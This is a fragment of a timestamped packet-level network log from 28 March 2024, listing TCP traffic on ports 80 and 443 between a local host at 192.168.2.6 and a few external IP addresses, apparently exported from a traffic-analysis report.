                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322130919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322155952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322181940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322181940 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322194099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322205067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322242022 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322243929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322257042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322309017 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322338104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322350025 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322360992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322371960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322382927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322390079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322390079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322395086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322407961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322417974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322434902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322441101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322453976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322464943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322493076 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322499037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322510958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322523117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322555065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322557926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322577000 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322582006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322604895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322609901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322626114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322633028 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322650909 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322657108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322673082 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322690964 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322700024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322712898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322726011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322738886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322751999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322762012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322791100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322792053 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322813034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322815895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322838068 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322866917 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322881937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322904110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322921991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322937012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322953939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322969913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.322971106 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323007107 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323033094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323044062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323055029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323067904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323081970 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323117971 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323153019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323164940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323178053 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323189974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323196888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323206902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323229074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.323263884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450117111 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450140953 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450160027 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450174093 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450184107 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450189114 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450202942 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450217009 CET8049714189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450221062 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.450264931 CET4971480192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.474117041 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.474194050 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.508806944 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.508836031 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.509181023 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.509308100 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.511174917 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.530926943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.533265114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.556242943 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738245010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738270044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738360882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738413095 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738451004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738507986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738522053 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738569021 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738580942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738626957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738666058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738698006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738718033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738744974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738789082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738837004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738888979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738926888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.738997936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739042997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739085913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739126921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739145041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739193916 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739224911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739269018 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739331961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739381075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739408016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739454985 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739494085 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739546061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739584923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739630938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739669085 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739723921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739804983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739840984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739851952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739890099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.739949942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740000963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740027905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740072966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740088940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740133047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740154028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740200043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740204096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740247965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740341902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740389109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740426064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740472078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740494013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740535975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740544081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740580082 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740638018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740685940 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740698099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740739107 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740808010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740854979 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740864992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740920067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740942955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740986109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.740995884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741046906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741101027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741185904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741230965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741267920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741303921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741338015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741372108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741405964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741522074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741566896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741568089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741611004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741698027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741712093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741739988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741763115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741833925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741925001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741971016 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.741997957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742036104 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742058039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742103100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742139101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742187977 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742201090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742247105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742264986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742309093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742324114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742340088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742377043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742402077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742444992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742511988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742559910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742582083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742628098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742652893 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742696047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742731094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742769957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742830038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742872953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742933989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742980957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.742991924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743033886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743098974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743144989 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743144989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743181944 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743257046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743302107 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743321896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743366003 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743396044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743441105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743479013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743527889 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743593931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743648052 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743683100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743725061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743798018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743844986 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743887901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.743931055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744002104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744045973 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744101048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744158030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744178057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744237900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744307041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744354963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744471073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744515896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744530916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744575024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744601011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744651079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744677067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744725943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744797945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744843006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744899988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744914055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744940996 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.744959116 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745012999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745064020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745064020 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745115995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745124102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745172024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745234966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745287895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745347977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745398045 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745421886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745466948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745486021 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745532990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745569944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745601892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745624065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.745625019 CET4971880192.168.2.6103.23.232.80
